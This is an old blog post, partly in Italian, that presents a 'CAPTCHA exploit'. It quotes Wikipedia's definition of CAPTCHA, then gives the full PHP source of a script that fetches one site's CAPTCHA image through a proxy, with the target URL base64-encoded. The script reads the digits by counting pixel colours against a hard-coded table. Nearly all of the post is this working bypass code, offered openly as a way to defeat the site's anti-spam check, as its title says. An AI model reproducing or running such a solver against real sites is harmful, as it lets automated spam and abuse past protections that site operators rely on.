20Nov/070
CAPTCHA Exploit ovvero, byebye trackback antispam
Wikipedia - "A CAPTCHA (IPA: /ˈkæptʃə/) is a type of challenge-response test used in computing to determine whether the user is human. "CAPTCHA" is a contrived acronym for "Completely Automated Public Turing test to tell Computers and Humans Apart", trademarked by Carnegie Mellon University. A CAPTCHA involves one computer (a server) which asks a user to complete a test. While the computer is able to generate and grade the test, it is not able to solve the test on its own. Because computers are unable to solve the CAPTCHA, any user entering a correct solution is presumed to be human. The term CAPTCHA was coined in 2000 by Luis von Ahn, Manuel Blum, Nicholas J. Hopper (all of Carnegie Mellon University), and John Langford (then of IBM). A common type of CAPTCHA requires that the user type the letters of a distorted image, sometimes with the addition of an obscured sequence of letters or digits that appears on the screen."
POC: http://g-brain.sesoyo.com/captchapwn.php
Crediti: http://g-brain.sesoyo.com/
Source Code:
1: <?php
2: $gif = fopen("x.gif",'w');
3: fwrite($gif,file_get_contents("http://g-brain.sesoyo.com/proxy/index.php?q=aHR0cDovL3d3dy52bGllZ2VydmFyaW5nZW4uY29tL25sL2dkY2hlY2sucGhw"));
4: fclose($gif);
5: echo "<img src='x.gif' alt='CAPTCHA'/><br />\n";
6:
7: $gif = ImageCreateFromGIF("x.gif");
8:
9: # Count color frequency
10: for ($y = 0;$y <= 37;$y++) {
11: for ($x = 0;$x <= 99;$x++) {
12: $color = imagecolorat($gif,$x,$y);
13: switch ($color) {
14: case 58:
15: $fiftyeightcount++;
16: break;
17: case 59:
18: $fiftyninecount++;
19: break;
20: case 60:
21: $sixtycount++;
22: break;
23: case 61:
24: $sixtyonecount++;
25: break;
26: case 62:
27: $sixtytwocount++;
28: break;
29: case 63:
30: $sixtythreecount++;
31: break;
32: }
33: }
34: }
35:
36: $color = 0;
37: $counts = array($fiftyeightcount,$fiftyninecount,$sixtycount,$sixtyonecount,$sixtytwocount,$sixtythreecount);
38:
39: # Use most frequent color as font color
40:
41: foreach ($counts as $n => $current) {
42: if ($current > $color) {
43: switch ($n) {
44: case 0:
45: $color = 58;
46: break;
47: case 1:
48: $color = 59;
49: break;
50: case 2:
51: $color = 60;
52: break;
53: case 3:
54: $color = 61;
55: break;
56: case 4:
57: $color = 62;
58: break;
59: case 5:
60: $color = 63;
61: break;
62: }
63: }
64: }
65:
66: $n = 0;
67: $counts = array();
68:
69: # Count occurency of font color in digit spaces
70: for ($y = 0;$y <= 27;$y++) {
71: for ($x = 15;$x <= 31;$x++) { if (imagecolorat($gif,$x,$y) == $color) { $onecount++; } }
72: for ($x = 36;$x <= 50;$x++) { if (imagecolorat($gif,$x,$y) == $color) { $twocount++; } }
73: for ($x = 51;$x <= 67;$x++) { if (imagecolorat($gif,$x,$y) == $color) { $threecount++; } }
74: for ($x = 69;$x <= 86;$x++) { if (imagecolorat($gif,$x,$y) == $color) { $fourcount++; } }
75: }
76:
77: $counts = array($onecount,$twocount,$threecount,$fourcount);
78:
79: # Font color frequency per digit:
80: #
81: # One:
82: # 0:
83: # 1: 74
84: # 2: 58
85: # 3: 63
86: # 4: 92
87: # 5: 79
88: # 6: 66
89: # 7: 62
90: # 8: 80
91: # 9: 71
92: # Two:
93: # 0: 62,63
94: # 1: 74,75
95: # 2: 56,57
96: # 3: 62
97: # 4: 84
98: # 5: 78,79
99: # 6: 65,66
100: # 7: 58
101: # 8: 80,81
102: # 9: 70,71,72
103: # Three:
104: # 0: 76,77
105: # 1: 74,75
106: # 2: 58,59
107: # 3: 63
108: # 4: 92
109: # 5: 79
110: # 6: 65,66,67,68
111: # 7: 62
112: # 8: 80,81,82
113: # 9: 70,71,72,73
114: # Four:
115: # 0: 77,78
116: # 1: 74
117: # 2: 58,59
118: # 3: 63
119: # 4: 92
120: # 5: 79
121: # 6: 66,67,68
122: # 7: 62
123: # 8: 80,81
124: # 9: 71,72,73
125:
126: $n = 0;
127: foreach ($counts as $c) {
128: $n++;
129: switch ($n) {
130: case 1:
131: switch($c) {
132: case 74:
133: echo 1;
134: break;
135: case 58:
136: echo 2;
137: break;
138: case 63:
139: echo 3;
140: break;
141: case 92:
142: echo 4;
143: break;
144: case 79:
145: echo 5;
146: break;
147: case 66:
148: echo 6;
149: break;
150: case 62:
151: echo 7;
152: break;
153: case 80:
154: echo 8;
155: break;
156: case 71:
157: echo 9;
158: break;
159: default:
160: echo "<br />\nDEBUG:<br />\nColor: $color<br />\nCount: $c<br />\nNumber: $n<br />\n";
161: break;
162: }
163: #if ($c == 62 || $c == 63) { echo "0" }
164: break;
165: case 2:
166: switch ($c) {
167: case 63:
168: echo 0;
169: break;
170: case 74:
171: case 75:
172: echo 1;
173: break;
174: case 56:
175: case 57:
176: echo 2;
177: break;
178: case 62:
179: echo 3;
180: break;
181: case 84:
182: echo 4;
183: break;
184: case 78:
185: case 79:
186: echo 5;
187: break;
188: case 65:
189: case 66:
190: echo 6;
191: break;
192: case 58:
193: echo 7;
194: break;
195: case 80:
196: case 81:
197: echo 8;
198: break;
199: case 70:
200: case 71:
201: case 72:
202: echo 9;
203: break;
204: default:
205: echo "<br />\nDEBUG:<br />\nColor: $color<br />\nCount: $c<br />\nNumber: $n<br />\n";
206: break;
207: }
208: break;
209: case 3:
210: switch ($c) {
211: case 76:
212: case 77:
213: echo 0;
214: break;
215: case 74:
216: case 75:
217: echo 1;
218: break;
219: case 58:
220: case 59:
221: echo 2;
222: break;
223: case 63:
224: echo 3;
225: break;
226: case 92:
227: echo 4;
228: break;
229: case 79:
230: echo 5;
231: break;
232: case 65:
233: case 66:
234: case 67:
235: case 68:
236: echo 6;
237: break;
238: case 62:
239: echo 7;
240: break;
241: case 80:
242: case 81:
243: case 82:
244: echo 8;
245: break;
246: case 70:
247: case 71:
248: case 72:
249: case 73:
250: echo 9;
251: break;
252: default:
253: echo "<br />\nDEBUG:<br />\nColor: $color<br />\nCount: $c<br />\nNumber: $n<br />\n";
254: break;
255: }
256: break;
257: case 4:
258: switch ($c) {
259: case 75:
260: case 76:
261: case 77:
262: case 78:
263: echo 0;
264: break;
265: case 74:
266: echo 1;
267: break;
268: case 58:
269: case 59:
270: echo 2;
271: break;
272: case 63:
273: echo 3;
274: break;
275: case 92:
276: echo 4;
277: break;
278: case 79:
279: echo 5;
280: break;
281: case 65:
282: case 66:
283: case 67:
284: case 68:
285: echo 6;
286: break;
287: case 62:
288: echo 7;
289: break;
290: case 80:
291: case 81:
292: echo 8;
293: break;
294: case 71:
295: case 72:
296: case 73:
297: echo 9;
298: break;
299: default:
300: echo "<br />\nDEBUG:<br />\nColor: $color<br />\nCount: $c<br />\nNumber: $n<br />\n";
301: break;
302: }
303: break;
304: default:
305: echo "<br />\nDEBUG:<br />\nColor: $color<br />\nCount: $c<br />\nNumber: $n<br />\n";
306: break;
307: }
308: }
309: echo "\n";
310: ?>
